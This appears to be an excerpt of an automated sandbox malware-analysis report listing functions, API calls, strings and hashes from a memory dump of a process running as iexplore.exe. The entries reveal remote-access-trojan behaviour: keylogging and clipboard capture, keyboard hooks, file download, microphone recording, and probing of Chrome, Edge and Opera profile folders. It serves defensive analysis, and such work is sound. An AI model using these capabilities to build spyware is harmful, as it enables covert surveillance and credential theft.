              • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 00442CED
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
              • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
              APIs
                • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
              • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CodeInfoPageValid
              • String ID: @"a/
              • API String ID: 546120528-2936340451
              • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
              • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
              • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
              • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: __alloca_probe_16__freea
              • String ID: @"a/
              • API String ID: 1635606685-2936340451
              • Opcode ID: b5bfd120457fd6491ffe418217d2ef53c53ab42291728ef1e813032315d7eb6d
              • Instruction ID: 8ea394e19242d531593115f3ad9b67f2d9726ff50e2d779c509e1c2fd2e4051b
              • Opcode Fuzzy Hash: b5bfd120457fd6491ffe418217d2ef53c53ab42291728ef1e813032315d7eb6d
              • Instruction Fuzzy Hash: F141D431A00511EBFF219B65CC42A5F77A4EF55720F65452BF808DB252EB3CD841C66D
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Info
              • String ID: $@"a/
              • API String ID: 1807457897-732748348
              • Opcode ID: 85bac515e0b8011970915d0e4f071ebe2cd541ee6bd63edc00ff13856e41abee
              • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
              • Opcode Fuzzy Hash: 85bac515e0b8011970915d0e4f071ebe2cd541ee6bd63edc00ff13856e41abee
              • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00442550
              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 004425D0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: @"a/
              • API String ID: 1834446548-2936340451
              • Opcode ID: 196e37cfe13fffe3aef580bc38f553c77a52a6f5a0f09c25fd37b981a44e175c
              • Instruction ID: 8965e9c959f3464d8f5570b211ec8dea26f0dea9c64cc2a0dc110a7510558e52
              • Opcode Fuzzy Hash: 196e37cfe13fffe3aef580bc38f553c77a52a6f5a0f09c25fd37b981a44e175c
              • Instruction Fuzzy Hash: 0E412A31A00155ABEB20DF14CE80BEA77B5EB48304F5681EAF54997241DBB9DDC1CF58
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 0040B797
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: [End of clipboard]$[Text copied to clipboard]
              • API String ID: 1881088180-3686566968
              • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
              • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
              • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
              • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
              APIs
              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: ACP$OCP
              • API String ID: 0-711371036
              • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
              • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
              • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
              • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
              • GetLastError.KERNEL32(?,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CE84,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B804
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: @"a/
              • API String ID: 442123175-2936340451
              • Opcode ID: 20af68afd06ab360e4bdb5e82f8ff8310ccf0ba4e5a73b2a20494d73fbee0cd8
              • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
              • Opcode Fuzzy Hash: 20af68afd06ab360e4bdb5e82f8ff8310ccf0ba4e5a73b2a20494d73fbee0cd8
              • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
              • GetLastError.KERNEL32(?,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CE84,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B716
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: @"a/
              • API String ID: 442123175-2936340451
              • Opcode ID: 4ce7ba64846fe54e21e128ad02a6922e6bc8b43f9bd01d5a8b125caf85c47eae
              • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
              • Opcode Fuzzy Hash: 4ce7ba64846fe54e21e128ad02a6922e6bc8b43f9bd01d5a8b125caf85c47eae
              • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
              APIs
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime
              • String ID: KeepAlive | Enabled | Timeout:
              • API String ID: 481472006-1507639952
              • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
              • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
              • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
              • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID: @"a/
              • API String ID: 2279764990-2936340451
              • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
              • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
              • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
              • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _abort
              • String ID: @"a$@"a/
              • API String ID: 1888311480-3295304544
              • Opcode ID: cfcd977aaaf8d974041d7b3abe1e98498d161bf915739d9dfa6fd2c97fb9e825
              • Instruction ID: 3d80131ce948400aaa814698e71f3e4389aafbd5e44b2ebacfd2c278c413863e
              • Opcode Fuzzy Hash: cfcd977aaaf8d974041d7b3abe1e98498d161bf915739d9dfa6fd2c97fb9e825
              • Instruction Fuzzy Hash: 12110A32650704ABEB14AF79DC0675E3395AF40B21F21442FF9189B2D2DFB8DC508A9D
              APIs
              • Sleep.KERNEL32 ref: 00416640
              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DownloadFileSleep
              • String ID: !D@
              • API String ID: 1931167962-604454484
              • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
              • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
              • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
              • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043500F
              • ___raise_securityfailure.LIBCMT ref: 004350F6
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FeaturePresentProcessor___raise_securityfailure
              • String ID: @"a/
              • API String ID: 3761405300-2936340451
              • Opcode ID: be40dc83abc0ca80c0fad86a9e7b4fd61104a5f1cd2425eea24a959416d4fa5e
              • Instruction ID: 285bdab9cd9bf10e1484ed0235a1a0c9f24c093ab76f059762c6817201674d9b
              • Opcode Fuzzy Hash: be40dc83abc0ca80c0fad86a9e7b4fd61104a5f1cd2425eea24a959416d4fa5e
              • Instruction Fuzzy Hash: 6D21CFB9520204DBD720DF1DE996A907BA4BB48314F10543AED0C8B7B1E3B569C18F8D
              APIs
              • GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime
              • String ID: | $%02i:%02i:%02i:%03i
              • API String ID: 481472006-2430845779
              • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
              • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
              • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
              • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: alarm.wav$hYG
              • API String ID: 1174141254-2782910960
              • Opcode ID: b09d6ad5bf3bcd9657e8e305d729ed8905f01874a871c29a92ebbed67346a3ad
              • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
              • Opcode Fuzzy Hash: b09d6ad5bf3bcd9657e8e305d729ed8905f01874a871c29a92ebbed67346a3ad
              • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CloseHandle.KERNEL32(?), ref: 0040B0B4
              • UnhookWindowsHookEx.USER32 ref: 0040B0C7
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
              • String ID: Online Keylogger Stopped
              • API String ID: 1623830855-1496645233
              • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
              • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
              • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
              • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: String
              • String ID: @"a/$LCMapStringEx
              • API String ID: 2568140703-3451265360
              • Opcode ID: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
              • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
              • Opcode Fuzzy Hash: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
              • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
              APIs
              • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447AE8,?,00000000,00401D55), ref: 004488D6
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DateFormat
              • String ID: @"a/$GetDateFormatEx
              • API String ID: 2793631785-2349607123
              • Opcode ID: 9237d65ecb02b51bfeeafc3c240a2db057b6523cf548bd361303a611af287ee8
              • Instruction ID: 0ebf002ecde0d386169e61255713c008da9fd7e3b7bab984e061162aac6e8738
              • Opcode Fuzzy Hash: 9237d65ecb02b51bfeeafc3c240a2db057b6523cf548bd361303a611af287ee8
              • Instruction Fuzzy Hash: 7501483254120DFBCF026FA0DC01EAE3F66EF18711F104529FD0916161CB3A9D21AB99
              APIs
              • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: wave$BufferHeaderPrepare
              • String ID: XMG
              • API String ID: 2315374483-813777761
              • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
              • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
              APIs
              • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,\@E,00453FFB,?,?,00000000,?), ref: 0044868C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CompareString
              • String ID: @"a/$\@E
              • API String ID: 1825529933-3307891709
              • Opcode ID: 1b0eaa5873461b8c2d3dab387735198f185510869bfb9b0e1d2616acece5c267
              • Instruction ID: 622657b534277e968d4e7dd8685de6a8af7918762fc26809a46afc5460126f39
              • Opcode Fuzzy Hash: 1b0eaa5873461b8c2d3dab387735198f185510869bfb9b0e1d2616acece5c267
              • Instruction Fuzzy Hash: AD01003250020AFBCF029F90DC019EE7F66EF48351F018559FA0926220CB3ADD32AB98
              APIs
              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447AE8,?,00000000,00401D55), ref: 00448A06
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FormatTime
              • String ID: @"a/$GetTimeFormatEx
              • API String ID: 3606616251-3781987912
              • Opcode ID: 2934a3575882834794cf16f03ea59d06fd3e359857ade1b4d3f816cc3acfa0db
              • Instruction ID: 0025d71d0d8aad31df4fd48d44da99138f0471d333ce770e45d6f505dc7ef455
              • Opcode Fuzzy Hash: 2934a3575882834794cf16f03ea59d06fd3e359857ade1b4d3f816cc3acfa0db
              • Instruction Fuzzy Hash: 7CF0AF31641209FBDF01AF51DC02EAE7F25EF08701F10456AFC0966262CE799D25ABD9
              APIs
              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00451608,?,00000055,00000050), ref: 00448A67
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DefaultUser
              • String ID: @"a/$GetUserDefaultLocaleName
              • API String ID: 3358694519-2300917997
              • Opcode ID: 74f7fa5f2c93d6f18c87def6390af893240570b53ff3debd2b16740c1bc349e7
              • Instruction ID: 06dbbe9c7d37a549d5e249eecffeb3e25643b503cf5fe1ade380aaf766155dd2
              • Opcode Fuzzy Hash: 74f7fa5f2c93d6f18c87def6390af893240570b53ff3debd2b16740c1bc349e7
              • Instruction Fuzzy Hash: 0FF02431640208FBDB00AFA1DC02EAEBF54DF04711F10817BFD086A262CE799D15968D
              APIs
              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Google\Chrome\
              • API String ID: 1174141254-4188645398
              • Opcode ID: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
              • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
              • Opcode Fuzzy Hash: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
              • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
              APIs
              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
              • API String ID: 1174141254-2800177040
              • Opcode ID: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
              • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
              • Opcode Fuzzy Hash: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
              • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
              APIs
              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: AppData$\Opera Software\Opera Stable\
              • API String ID: 1174141254-1629609700
              • Opcode ID: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
              • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
              • Opcode Fuzzy Hash: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
              • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: @"a/$InitializeCriticalSectionEx
              • API String ID: 2593887523-2244523025
              • Opcode ID: b741835cfaac6ce161a3087281ae10c970efcaaa73cd67c244d7eeadfd70930d
              • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
              • Opcode Fuzzy Hash: b741835cfaac6ce161a3087281ae10c970efcaaa73cd67c244d7eeadfd70930d
              • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
              APIs
              • GetKeyState.USER32(00000011), ref: 0040B64B
                • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
              • String ID: [AltL]$[AltR]
              • API String ID: 2738857842-2658077756
              • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
              • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
              • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
              • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
              APIs
              • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: uD
              • API String ID: 0-2547262877
